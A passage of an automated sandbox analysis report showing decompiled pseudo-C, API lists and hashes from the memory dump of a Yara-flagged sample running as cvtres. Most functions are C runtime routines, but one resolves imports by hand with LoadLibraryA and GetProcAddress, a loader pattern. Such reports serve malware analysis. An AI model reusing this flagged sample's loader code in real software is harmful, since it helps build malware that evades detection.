                                                                    												__eflags = _t108;
                                                                    												if(_t108 <= 0) {
                                                                    													break;
                                                                    												}
                                                                    												_push( *(_t105 + 0x54));
                                                                    												_t108 = _t108 - 1;
                                                                    												__eflags = _t108;
                                                                    												_push( *((char*)(_t108 +  *((intOrPtr*)(_t109 - 0x34)))));
                                                                    												E0041F1BE(_t83, _t105, _t108, _t108);
                                                                    											}
                                                                    											L32:
                                                                    											_t106 =  *(_t109 - 0x2d) & 0x000000ff;
                                                                    											L26:
                                                                    											E00404354(_t109 - 0x2c, 1, 0);
                                                                    											L3:
                                                                    											return E00420888(_t83, _t105, _t106);
                                                                    										}
                                                                    										__eflags =  *((intOrPtr*)(_t109 - 0x18)) - 0x10;
                                                                    										if( *((intOrPtr*)(_t109 - 0x18)) < 0x10) {
                                                                    											_t64 = _t109 - 0x2c;
                                                                    										}
                                                                    										__eflags =  *((intOrPtr*)(_t109 - 0x34)) - _t64;
                                                                    										E0040453E(_t109 - 0x2c, 0,  *((intOrPtr*)(_t109 - 0x34)) - _t64);
                                                                    										L23:
                                                                    										_push( *(_t105 + 0x54));
                                                                    										_t54 = E0041F65A(_t83, _t105, _t106, __eflags);
                                                                    										continue;
                                                                    									}
                                                                    									__eflags = _t59 - 3;
                                                                    									if(_t59 != 3) {
                                                                    										break;
                                                                    									}
                                                                    									__eflags =  *((intOrPtr*)(_t109 - 0x1c)) - 1;
                                                                    									if(__eflags < 0) {
                                                                    										goto L23;
                                                                    									}
                                                                    									__eflags =  *((intOrPtr*)(_t109 - 0x18)) - 0x10;
                                                                    									_t71 =  *((intOrPtr*)(_t109 - 0x2c));
                                                                    									if( *((intOrPtr*)(_t109 - 0x18)) < 0x10) {
                                                                    										_t71 = _t109 - 0x2c;
                                                                    									}
                                                                    									E0041F87F(_t109 - 0x2d, _t83, _t71, _t83);
                                                                    									goto L32;
                                                                    								}
                                                                    							}
                                                                    							__eflags = _t106;
                                                                    							goto L26;
                                                                    						}
                                                                    						_push( *(_t105 + 0x54));
                                                                    						_t51 = E0041F65A(0, _t105, _t106, __eflags);
                                                                    						__eflags = _t51 - 0xffffffff;
                                                                    						if(_t51 == 0xffffffff) {
                                                                    							goto L5;
                                                                    						}
                                                                    						goto L3;
                                                                    					}
                                                                    					L5:
                                                                    					goto L3;
                                                                    				}
                                                                    				_t51 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x20))));
                                                                    				if( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x20)))) >=  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x30)))) +  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x20))))) {
                                                                    					goto L4;
                                                                    				}
                                                                    				 *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x30)))) =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x30)))) - 1;
                                                                    				_t105 =  *((intOrPtr*)(__ecx + 0x20));
                                                                    				 *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x20)))) =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x20)))) + 1;
                                                                    				goto L3;
                                                                    			}














                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00413f95
                                                                    0x00413f98
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00413f9a
                                                                    0x00413f9e
                                                                    0x00413fa1
                                                                    0x00413fa3
                                                                    0x00413fa3
                                                                    0x00413fad
                                                                    0x00000000
                                                                    0x00413fb2
                                                                    0x00413f87
                                                                    0x00413fed
                                                                    0x00000000
                                                                    0x00413fed
                                                                    0x00413f19
                                                                    0x00413f1c
                                                                    0x00413f22
                                                                    0x00413f25
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00413f27
                                                                    0x00413f08
                                                                    0x00000000
                                                                    0x00413f08
                                                                    0x00413ee1
                                                                    0x00413ee9
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00413eee
                                                                    0x00413ef0
                                                                    0x00413ef8
                                                                    0x00000000

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _fgetc$H_prolog3_Xinvalid_argument_memcpy_sstd::_
                                                                    • String ID:
                                                                    • API String ID: 2343611727-0
                                                                    • Opcode ID: 859c8ba64e4d92bb646eeaa553d6fd81d5bdb03812900f0a166a383031397a8b
                                                                    • Instruction ID: 3f14c8554030ee37678039532fba8f831053acf65d3247fdaa66f77ba3abbdc2
                                                                    • Opcode Fuzzy Hash: 859c8ba64e4d92bb646eeaa553d6fd81d5bdb03812900f0a166a383031397a8b
                                                                    • Instruction Fuzzy Hash: D4519471E00209DFCB10DFA8C8C19EEB7B5FF09315B10452BE511A3691D738EA85CB98
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 93%
                                                                    			E00403ECC(void* __esi) {
                                                                    				signed short* _v8;
                                                                    				struct HINSTANCE__* _v12;
                                                                    				signed short _v16;
                                                                    				void* __edi;
                                                                    				intOrPtr _t34;
                                                                    				intOrPtr _t36;
                                                                    				signed short _t37;
                                                                    				signed short _t38;
                                                                    				intOrPtr _t40;
                                                                    				signed short _t42;
                                                                    				CHAR* _t43;
                                                                    				_Unknown_base(*)()* _t44;
                                                                    				signed int _t45;
                                                                    				signed int _t48;
                                                                    				signed short _t55;
                                                                    				signed short _t60;
                                                                    				void* _t64;
                                                                    				signed short _t67;
                                                                    				signed short _t69;
                                                                    				void* _t70;
                                                                    				void* _t71;
                                                                    				void* _t72;
                                                                    
                                                                    				_t70 = __esi;
                                                                    				_t34 =  *((intOrPtr*)(__esi + 0xc0));
                                                                    				_t72 = _t71 - 0xc;
                                                                    				if(_t34 != 0 &&  *((intOrPtr*)(__esi + 0xc4)) != 0) {
                                                                    					_t55 =  *((intOrPtr*)(__esi + 0x144)) + _t34;
                                                                    					while(1) {
                                                                    						_t36 =  *((intOrPtr*)(_t55 + 0xc));
                                                                    						if(_t36 == 0) {
                                                                    							goto L24;
                                                                    						}
                                                                    						_t37 = LoadLibraryA( *((intOrPtr*)(_t70 + 0x144)) + _t36);
                                                                    						_v12 = _t37;
                                                                    						__eflags = _t37;
                                                                    						if(_t37 == 0) {
                                                                    							L26:
                                                                    							_push(6);
                                                                    							goto L27;
                                                                    						} else {
                                                                    							_t38 =  *(_t70 + 0x154);
                                                                    							__eflags =  *(_t70 + 0x150) - _t38;
                                                                    							if( *(_t70 + 0x150) < _t38) {
                                                                    								_t67 = _v16;
                                                                    								goto L13;
                                                                    							} else {
                                                                    								__eflags = _t38;
                                                                    								if(_t38 == 0) {
                                                                    									_t45 = 0x10;
                                                                    								} else {
                                                                    									_t45 = _t38 + _t38;
                                                                    								}
                                                                    								 *(_t70 + 0x154) = _t45;
                                                                    								_t67 = E0041DAE4(_t64, _t69, _t70, _t45 << 2);
                                                                    								_v16 = _t67;
                                                                    								__eflags = _t67;
                                                                    								if(_t67 == 0) {
                                                                    									_push(3);
                                                                    									goto L27;
                                                                    								} else {
                                                                    									_t48 =  *(_t70 + 0x150);
                                                                    									__eflags = _t48;
                                                                    									if(_t48 != 0) {
                                                                    										__eflags = _t48 << 2;
                                                                    										E00420090(_t67,  *(_t70 + 0x14c), _t48 << 2);
                                                                    										_t72 = _t72 + 0xc;
                                                                    									}
                                                                    									E0041DAAA( *(_t70 + 0x14c));
                                                                    									 *(_t70 + 0x14c) = _t67;
                                                                    									L13:
                                                                    									 *((intOrPtr*)(_t67 +  *(_t70 + 0x150) * 4)) = _v12;
                                                                    									 *(_t70 + 0x150) =  *(_t70 + 0x150) + 1;
                                                                    									_t40 =  *((intOrPtr*)(_t70 + 0x144));
                                                                    									_t69 =  *((intOrPtr*)(_t55 + 0x10)) + _t40;
                                                                    									__eflags =  *(_t55 + 4);
                                                                    									_v8 = _t69;
                                                                    									if( *(_t55 + 4) == 0) {
                                                                    										goto L21;
                                                                    									} else {
                                                                    										_t60 =  *_t55;
                                                                    										__eflags = _t60;
                                                                    										if(_t60 == 0) {
                                                                    											_push(8);
                                                                    											L27:
                                                                    											_pop(0);
                                                                    										} else {
                                                                    											_v8 = _t60 + _t40;
                                                                    											while(1) {
                                                                    												L21:
                                                                    												_t42 =  *_v8;
                                                                    												__eflags = _t42;
                                                                    												if(__eflags == 0) {
                                                                    													break;
                                                                    												}
                                                                    												if(__eflags >= 0) {
                                                                    													_t43 = _t42 +  *((intOrPtr*)(_t70 + 0x144)) + 2;
                                                                    												} else {
                                                                    													_t43 = _t42 & 0x0000ffff;
                                                                    												}
                                                                    												_t44 = GetProcAddress(_v12, _t43);
                                                                    												 *_t69 = _t44;
                                                                    												__eflags = _t44;
                                                                    												if(_t44 == 0) {
                                                                    													goto L26;
                                                                    												} else {
                                                                    													_v8 =  &(_v8[2]);
                                                                    													_t69 = _t69 + 4;
                                                                    													__eflags = _t69;
                                                                    													continue;
                                                                    												}
                                                                    												goto L25;
                                                                    											}
                                                                    											_t55 = _t55 + 0x14;
                                                                    											__eflags = _t55;
                                                                    											continue;
                                                                    										}
                                                                    									}
                                                                    								}
                                                                    							}
                                                                    						}
                                                                    						goto L25;
                                                                    					}
                                                                    					goto L24;
                                                                    				}
                                                                    				L25:
                                                                    				return 0;
                                                                    			}


























                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LibraryLoad_free_malloc_memmove
                                                                    • String ID:
                                                                    • API String ID: 2732542392-0
                                                                    • Opcode ID: 051c01f84066e79673752200a5054dd5dbeda7846905cbe6649358e6d2c8d43e
                                                                    • Instruction ID: 46ab6060c51a40a1c79e3179ae505a5aaa7851d5d7b413b5c03b63ddfb1eae5a
                                                                    • Opcode Fuzzy Hash: 051c01f84066e79673752200a5054dd5dbeda7846905cbe6649358e6d2c8d43e
                                                                    • Instruction Fuzzy Hash: 07313271A00702EFDB21CF68C845BA7BBF9AF44346F14447AE85AE7380D735EA41DA15
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 94%
                                                                    			E0042D02C(void* __edx, void* __edi, void* __esi, void* _a4, long _a8) {
                                                                    				void* _t7;
                                                                    				long _t8;
                                                                    				intOrPtr* _t9;
                                                                    				intOrPtr* _t12;
                                                                    				long _t27;
                                                                    				long _t30;
                                                                    
                                                                    				if(_a4 != 0) {
                                                                    					_push(__esi);
                                                                    					_t30 = _a8;
                                                                    					__eflags = _t30;
                                                                    					if(_t30 != 0) {
                                                                    						_push(__edi);
                                                                    						while(1) {
                                                                    							__eflags = _t30 - 0xffffffe0;
                                                                    							if(_t30 > 0xffffffe0) {
                                                                    								break;
                                                                    							}
                                                                    							__eflags = _t30;
                                                                    							if(_t30 == 0) {
                                                                    								_t30 = _t30 + 1;
                                                                    								__eflags = _t30;
                                                                    							}
                                                                    							_t7 = HeapReAlloc( *0x445024, 0, _a4, _t30);
                                                                    							_t27 = _t7;
                                                                    							__eflags = _t27;
                                                                    							if(_t27 != 0) {
                                                                    								L17:
                                                                    								_t8 = _t27;
                                                                    							} else {
                                                                    								__eflags =  *0x44568c - _t7;
                                                                    								if(__eflags == 0) {
                                                                    									_t9 = E00422147(__eflags);
                                                                    									 *_t9 = E00422105(GetLastError());
                                                                    									goto L17;
                                                                    								} else {
                                                                    									__eflags = E004235E2(_t7, _t30);
                                                                    									if(__eflags == 0) {
                                                                    										_t12 = E00422147(__eflags);
                                                                    										 *_t12 = E00422105(GetLastError());
                                                                    										L12:
                                                                    										_t8 = 0;
                                                                    										__eflags = 0;
                                                                    									} else {
                                                                    										continue;
                                                                    									}
                                                                    								}
                                                                    							}
                                                                    							goto L14;
                                                                    						}
                                                                    						E004235E2(_t6, _t30);
                                                                    						 *((intOrPtr*)(E00422147(__eflags))) = 0xc;
                                                                    						goto L12;
                                                                    					} else {
                                                                    						E0041DAAA(_a4);
                                                                    						_t8 = 0;
                                                                    					}
                                                                    					L14:
                                                                    					return _t8;
                                                                    				} else {
                                                                    					return E0041DAE4(__edx, __edi, __esi, _a8);
                                                                    				}
                                                                    			}










                                                                    APIs
                                                                    • _malloc.LIBCMT ref: 0042D03A
                                                                      • Part of subcall function 0041DAE4: __FF_MSGBANNER.LIBCMT ref: 0041DAFD
                                                                      • Part of subcall function 0041DAE4: __NMSG_WRITE.LIBCMT ref: 0041DB04
                                                                      • Part of subcall function 0041DAE4: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,00403F3E,00000010), ref: 0041DB29
                                                                    • _free.LIBCMT ref: 0042D04D
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateHeap_free_malloc
                                                                    • String ID:
                                                                    • API String ID: 1020059152-0
                                                                    • Opcode ID: 1ad92e8f709057c87a4a1958a32fad082944bfe4aedf51acdc71a3099711d208
                                                                    • Instruction ID: 52f07516f93ad42c093f850dc285075b678ee9902cea612d048988dfe94a3330
                                                                    • Opcode Fuzzy Hash: 1ad92e8f709057c87a4a1958a32fad082944bfe4aedf51acdc71a3099711d208
                                                                    • Instruction Fuzzy Hash: C311B932F045306BCB213F75BC04A9A37A4AF453A8F61442BFD4986161DA7C8842C69C
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 78%
                                                                    			E00425CDC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                    				signed int _t12;
                                                                    				void* _t28;
                                                                    				intOrPtr _t29;
                                                                    				void* _t30;
                                                                    				void* _t31;
                                                                    
                                                                    				_t31 = __eflags;
                                                                    				_t26 = __edi;
                                                                    				_t25 = __edx;
                                                                    				_t20 = __ebx;
                                                                    				_push(0xc);
                                                                    				_push(0x4408f8);
                                                                    				E00427300(__ebx, __edi, __esi);
                                                                    				_t28 = E00425F05(__ebx, __edx, _t31);
                                                                    				_t12 =  *0x443bb0; // 0xfffffffe
                                                                    				if(( *(_t28 + 0x70) & _t12) == 0) {
                                                                    					L6:
                                                                    					E004279D9(_t20, _t26, 0xc);
                                                                    					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
                                                                    					_t29 = _t28 + 0x6c;
                                                                    					 *((intOrPtr*)(_t30 - 0x1c)) = E00425C8F(_t29,  *0x443df8);
                                                                    					 *(_t30 - 4) = 0xfffffffe;
                                                                    					E00425D49();
                                                                    				} else {
                                                                    					_t33 =  *((intOrPtr*)(_t28 + 0x6c));
                                                                    					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
                                                                    						goto L6;
                                                                    					} else {
                                                                    						_t29 =  *((intOrPtr*)(E00425F05(_t20, __edx, _t33) + 0x6c));
                                                                    					}
                                                                    				}
                                                                    				_t34 = _t29;
                                                                    				if(_t29 == 0) {
                                                                    					_push(0x20);
                                                                    					E004233A7(_t25, _t34);
                                                                    				}
                                                                    				return E00427345(_t29);
                                                                    			}









                                                                    APIs
                                                                    • __getptd.LIBCMT ref: 00425CE8
                                                                      • Part of subcall function 00425F05: __getptd_noexit.LIBCMT ref: 00425F08
                                                                      • Part of subcall function 00425F05: __amsg_exit.LIBCMT ref: 00425F15
                                                                    • __getptd.LIBCMT ref: 00425CFF
                                                                    • __amsg_exit.LIBCMT ref: 00425D0D
                                                                    • __lock.LIBCMT ref: 00425D1D
                                                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 00425D31
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                    • String ID:
                                                                    • API String ID: 938513278-0
                                                                    • Opcode ID: 085068763e0e04cbc0e655327bd616aad83163aeadefa494f9d7f1e74486b431
                                                                    • Instruction ID: b30473b7eda2014008e12d015fcb2fcbf787ee5522c11c27e254133bd8c941d7
                                                                    • Opcode Fuzzy Hash: 085068763e0e04cbc0e655327bd616aad83163aeadefa494f9d7f1e74486b431
                                                                    • Instruction Fuzzy Hash: 46F06232B54B309AE721BB7AB40A7193290AF00729FA1815FF9115B2C2CB7C5A409A5D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 96%
                                                                    			E00417D7D(void* __ebx, intOrPtr __ecx, char __edx, void* __edi, void* __esi, void* __eflags) {
                                                                    				void* _t231;
                                                                    				signed int _t232;
                                                                    				intOrPtr _t238;
                                                                    				signed int _t244;
                                                                    				char* _t245;
                                                                    				void* _t249;
                                                                    				signed int _t251;
                                                                    				void* _t253;
                                                                    				void* _t254;
                                                                    				intOrPtr* _t257;
                                                                    				intOrPtr* _t258;
                                                                    				intOrPtr* _t270;
                                                                    				intOrPtr* _t271;
                                                                    				signed int _t276;
                                                                    				intOrPtr* _t281;
                                                                    				intOrPtr* _t282;
                                                                    				char _t285;
                                                                    				intOrPtr* _t288;
                                                                    				intOrPtr* _t290;
                                                                    				char* _t298;
                                                                    				intOrPtr _t304;
                                                                    				signed int _t306;
                                                                    				intOrPtr _t307;
                                                                    				signed int _t309;
                                                                    				char* _t311;
                                                                    				signed int _t316;
                                                                    				void* _t317;
                                                                    				intOrPtr* _t321;
                                                                    				signed int _t329;
                                                                    				intOrPtr _t330;
                                                                    				intOrPtr _t333;
                                                                    				char* _t341;
                                                                    				intOrPtr _t361;
                                                                    				void* _t372;
                                                                    				signed int _t375;
                                                                    				void* _t380;
                                                                    				void* _t381;
                                                                    				void* _t383;
                                                                    				void* _t384;
                                                                    				void* _t385;
                                                                    				void* _t391;
                                                                    				void* _t406;
                                                                    
                                                                    				_t391 = __eflags;
                                                                    				_t357 = __edx;
                                                                    				E0042083E(E00433FBA, __ebx, __edi, __esi);
                                                                    				 *((char*)(_t380 - 0x80)) =  *((intOrPtr*)(_t380 + 0xc));
                                                                    				 *((intOrPtr*)(_t380 - 0x4c)) =  *((intOrPtr*)(_t380 + 0x10));
                                                                    				 *(_t380 - 0x60) =  *(_t380 + 0x14);
                                                                    				 *(_t380 - 0x74) =  *(_t380 + 0x18);
                                                                    				 *(_t380 - 0x58) =  *(_t380 + 0x1c);
                                                                    				_t361 = __ecx;
                                                                    				 *((intOrPtr*)(_t380 - 0x50)) =  *((intOrPtr*)(_t380 + 0x20));
                                                                    				 *((intOrPtr*)(_t380 - 0x7c)) = __ecx;
                                                                    				_t231 = E0040E367(__ecx, _t380 - 0x84);
                                                                    				_t316 = 0;
                                                                    				 *(_t380 - 4) = 0;
                                                                    				_t232 = E00418714(0, _t361, _t380 - 0x84, _t391);
                                                                    				 *(_t380 - 4) =  *(_t380 - 4) | 0xffffffff;
                                                                    				_t375 = _t232;
                                                                    				 *(_t380 - 0x6c) = _t375;
                                                                    				E0040E0FE(_t380 - 0x84);
                                                                    				E00418661(_t375, _t380 - 0x48);
                                                                    				 *(_t380 - 4) = 1;
                                                                    				_t329 = _t375;
                                                                    				 *((char*)(_t380 - 0x8c)) =  *((intOrPtr*)( *_t375 + 8))(_t231, 0x80);
                                                                    				 *((intOrPtr*)(_t380 - 0x18)) = 0xf;
                                                                    				 *((intOrPtr*)(_t380 - 0x1c)) = 0;
                                                                    				 *((char*)(_t380 - 0x2c)) = 0;
                                                                    				_t376 =  *((intOrPtr*)(_t380 - 0x4c));
                                                                    				 *(_t380 - 4) = 2;
                                                                    				_t238 =  *((intOrPtr*)( *((intOrPtr*)(_t380 - 0x4c))));
                                                                    				if(_t238 == 0x2b) {
                                                                    					L2:
                                                                    					 *(_t380 - 0x78) = 1;
                                                                    					L3:
                                                                    					 *((char*)(_t380 - 0x5c)) =  *((intOrPtr*)( *((intOrPtr*)(E0041FD3A(_t361, _t376, _t393)))));
                                                                    					 *((short*)(_t380 - 0x5b)) = 0x65;
                                                                    					 *(_t380 - 0x54) = E0041E960(_t376, 0x65,  *((intOrPtr*)(_t380 - 0x50)));
                                                                    					_t244 = E0041E960(_t376,  *((char*)(_t380 - 0x5c)),  *((intOrPtr*)(_t380 - 0x50)));
                                                                    					_t383 = _t381 + 0x18;
                                                                    					 *(_t380 - 0x64) = _t244;
                                                                    					if(_t244 == _t316) {
                                                                    						 *(_t380 - 0x58) = _t316;
                                                                    					}
                                                                    					_t245 =  *((intOrPtr*)(_t380 - 0x48));
                                                                    					if( *((intOrPtr*)(_t380 - 0x34)) < 0x10) {
                                                                    						_t245 = _t380 - 0x48;
                                                                    					}
                                                                    					if( *_t245 == 0x7f) {
                                                                    						L32:
                                                                    						_t330 =  *((intOrPtr*)(_t361 + 0x20));
                                                                    						_t249 =  *((intOrPtr*)(_t380 - 0x50)) +  *(_t380 - 0x58) +  *(_t380 - 0x74) +  *(_t380 - 0x60);
                                                                    						_t406 =  *((intOrPtr*)(_t361 + 0x24)) - _t316;
                                                                    						if(_t406 < 0 || _t406 <= 0 && _t330 <= _t316 || _t330 <= _t249) {
                                                                    							 *(_t380 - 0x54) = _t316;
                                                                    						} else {
                                                                    							 *(_t380 - 0x54) = _t330 - _t249;
                                                                    						}
                                                                    						_t251 =  *(_t361 + 0x14) & 0x000001c0;
                                                                    						if(_t251 != 0x40) {
                                                                    							if(_t251 == 0x100 &&  *(_t380 - 0x78) > _t316) {
                                                                    								 *((intOrPtr*)(_t380 - 0x68)) =  *((intOrPtr*)(_t380 + 0x24));
                                                                    								 *(_t380 - 0x64) =  *(_t380 + 0x28);
                                                                    								_t357 =  *((intOrPtr*)( *((intOrPtr*)(_t380 - 0x4c))));
                                                                    								_t376 = _t380 - 0x68;
                                                                    								E00418619( *((intOrPtr*)( *((intOrPtr*)(_t380 - 0x4c)))), _t380 - 0x68);
                                                                    								 *((intOrPtr*)(_t380 - 0x4c)) =  *((intOrPtr*)(_t380 - 0x4c)) + 1;
                                                                    								 *((intOrPtr*)(_t380 - 0x50)) =  *((intOrPtr*)(_t380 - 0x50)) - 1;
                                                                    								 *((intOrPtr*)(_t380 + 0x24)) =  *((intOrPtr*)(_t380 - 0x68));
                                                                    								 *(_t380 + 0x28) =  *(_t380 - 0x64);
                                                                    							}
                                                                    							_t290 = E00418469(_t380 - 0x68,  *((intOrPtr*)(_t380 + 0x24)),  *(_t380 + 0x28),  *((intOrPtr*)(_t380 - 0x80)),  *(_t380 - 0x54));
                                                                    							 *((intOrPtr*)(_t380 + 0x24)) =  *_t290;
                                                                    							 *(_t380 - 0x54) = _t316;
                                                                    							 *(_t380 + 0x28) =  *(_t290 + 4);
                                                                    							_t383 = _t383 + 0x10;
                                                                    						}
                                                                    						_t253 = E0041E960( *((intOrPtr*)(_t380 - 0x4c)),  *((char*)(_t380 - 0x5c)),  *((intOrPtr*)(_t380 - 0x50)));
                                                                    						_t384 = _t383 + 0xc;
                                                                    						if(_t253 != _t316) {
                                                                    							_t317 = _t253 -  *((intOrPtr*)(_t380 - 0x4c)) + 1;
                                                                    							_t281 = E00418591( *((intOrPtr*)(_t380 - 0x4c)), _t357, _t380 - 0x68, _t317 - 1,  *((intOrPtr*)(_t380 - 0x8c)),  *((intOrPtr*)(_t380 + 0x24)),  *(_t380 + 0x28));
                                                                    							 *((intOrPtr*)(_t380 + 0x24)) =  *_t281;
                                                                    							 *(_t380 + 0x28) =  *(_t281 + 4);
                                                                    							_t282 = E00418469(_t380 - 0x68,  *_t281,  *(_t281 + 4), 0x30,  *(_t380 - 0x60));
                                                                    							 *((intOrPtr*)(_t380 + 0x24)) =  *_t282;
                                                                    							 *(_t380 + 0x28) =  *(_t282 + 4);
                                                                    							_t285 =  *((intOrPtr*)( *( *(_t380 - 0x6c)) + 4))();
                                                                    							 *((intOrPtr*)(_t380 - 0x70)) =  *((intOrPtr*)(_t380 + 0x24));
                                                                    							_t357 = _t285;
                                                                    							_t376 = _t380 - 0x70;
                                                                    							 *(_t380 - 0x6c) =  *(_t380 + 0x28);
                                                                    							E00418619(_t285, _t380 - 0x70);
                                                                    							 *((intOrPtr*)(_t380 + 0x24)) =  *((intOrPtr*)(_t380 - 0x70));
                                                                    							 *(_t380 + 0x28) =  *(_t380 - 0x6c);
                                                                    							_t288 = E00418469(_t380 - 0x70,  *((intOrPtr*)(_t380 - 0x70)),  *(_t380 - 0x6c), 0x30,  *(_t380 - 0x74));
                                                                    							 *((intOrPtr*)(_t380 - 0x4c)) =  *((intOrPtr*)(_t380 - 0x4c)) + _t317;
                                                                    							 *((intOrPtr*)(_t380 - 0x50)) =  *((intOrPtr*)(_t380 - 0x50)) - _t317;
                                                                    							 *((intOrPtr*)(_t380 + 0x24)) =  *_t288;
                                                                    							_t384 = _t384 + 0x34;
                                                                    							 *(_t380 + 0x28) =  *(_t288 + 4);
                                                                    							_t316 = 0;
                                                                    						}
                                                                    						_t254 = E0041E960( *((intOrPtr*)(_t380 - 0x4c)), 0x65,  *((intOrPtr*)(_t380 - 0x50)));
                                                                    						_t385 = _t384 + 0xc;
                                                                    						if(_t254 != _t316) {
                                                                    							 *(_t380 - 0x6c) = _t254 -  *((intOrPtr*)(_t380 - 0x4c)) + 1;
                                                                    							_t270 = E00418591( *((intOrPtr*)(_t380 - 0x4c)), _t357, _t380 - 0x88, _t254 -  *((intOrPtr*)(_t380 - 0x4c)) + 1 - 1,  *((intOrPtr*)(_t380 - 0x8c)),  *((intOrPtr*)(_t380 + 0x24)),  *(_t380 + 0x28));
                                                                    							 *((intOrPtr*)(_t380 + 0x24)) =  *_t270;
                                                                    							 *(_t380 + 0x28) =  *(_t270 + 4);
                                                                    							_t271 = E00418469(_t380 - 0x68,  *_t270,  *(_t270 + 4), 0x30,  *(_t380 - 0x58));
                                                                    							 *((intOrPtr*)(_t380 + 0x24)) =  *_t271;
                                                                    							 *(_t380 + 0x28) =  *(_t271 + 4);
                                                                    							_t385 = _t385 + 0x24;
                                                                    							 *(_t380 - 0x58) = _t316;
                                                                    							_t341 = "E";
                                                                    							if(( *( *((intOrPtr*)(_t380 - 0x7c)) + 0x14) & 0x00000004) == 0) {
                                                                    								_t341 = "e";
                                                                    							}
                                                                    							 *((intOrPtr*)(_t380 - 0x88)) =  *_t271;
                                                                    							_t357 =  *_t341;
                                                                    							_t376 = _t380 - 0x88;
                                                                    							 *(_t380 - 0x84) =  *(_t271 + 4);
                                                                    							E00418619( *_t341, _t380 - 0x88);
                                                                    							 *((intOrPtr*)(_t380 + 0x24)) =  *((intOrPtr*)(_t380 - 0x88));
                                                                    							 *(_t380 + 0x28) =  *(_t380 - 0x84);
                                                                    							_t276 =  *(_t380 - 0x6c);
                                                                    							 *((intOrPtr*)(_t380 - 0x4c)) =  *((intOrPtr*)(_t380 - 0x4c)) + _t276;
                                                                    							 *((intOrPtr*)(_t380 - 0x50)) =  *((intOrPtr*)(_t380 - 0x50)) - _t276;
                                                                    						}
                                                                    						_t257 = E00418591( *((intOrPtr*)(_t380 - 0x4c)), _t357, _t380 - 0x70,  *((intOrPtr*)(_t380 - 0x50)),  *((intOrPtr*)(_t380 - 0x8c)),  *((intOrPtr*)(_t380 + 0x24)),  *(_t380 + 0x28));
                                                                    						 *((intOrPtr*)(_t380 + 0x24)) =  *_t257;
                                                                    						 *(_t380 + 0x28) =  *(_t257 + 4);
                                                                    						_t258 = E00418469(_t380 - 0x68,  *_t257,  *(_t257 + 4), 0x30,  *(_t380 - 0x58));
                                                                    						_t333 =  *((intOrPtr*)(_t380 - 0x7c));
                                                                    						 *((intOrPtr*)(_t380 + 0x24)) =  *_t258;
                                                                    						 *(_t380 + 0x28) =  *(_t258 + 4);
                                                                    						 *(_t333 + 0x20) = _t316;
                                                                    						 *(_t333 + 0x24) = _t316;
                                                                    						E00418469( *((intOrPtr*)(_t380 + 8)),  *_t258,  *(_t258 + 4),  *((intOrPtr*)(_t380 - 0x80)),  *(_t380 - 0x54));
                                                                    						E00404354(_t380 - 0x2c, 1, _t316);
                                                                    						E00404354(_t380 - 0x48, 1, _t316);
                                                                    						return E00420888(_t316,  *((intOrPtr*)(_t380 + 8)), _t376);
                                                                    					} else {
                                                                    						_t298 =  *((intOrPtr*)(_t380 - 0x48));
                                                                    						if( *((intOrPtr*)(_t380 - 0x34)) < 0x10) {
                                                                    							_t298 = _t380 - 0x48;
                                                                    						}
                                                                    						_t398 =  *_t298;
                                                                    						if( *_t298 > 0) {
                                                                    							E0040C2E9(_t380 - 0x2c,  *((intOrPtr*)(_t380 - 0x50)), _t380, _t398, _t376);
                                                                    							if( *(_t380 - 0x54) != 0) {
                                                                    								__eflags =  *(_t380 - 0x64);
                                                                    								if( *(_t380 - 0x64) == 0) {
                                                                    									E0040C3CF( *(_t380 - 0x60), _t329, _t380 - 0x2c, _t380, 0x30);
                                                                    									_t53 = _t380 - 0x60;
                                                                    									 *_t53 =  *(_t380 - 0x60) & 0x00000000;
                                                                    									__eflags =  *_t53;
                                                                    								}
                                                                    								__eflags =  *(_t380 - 0x54) -  *((intOrPtr*)(_t380 - 0x4c));
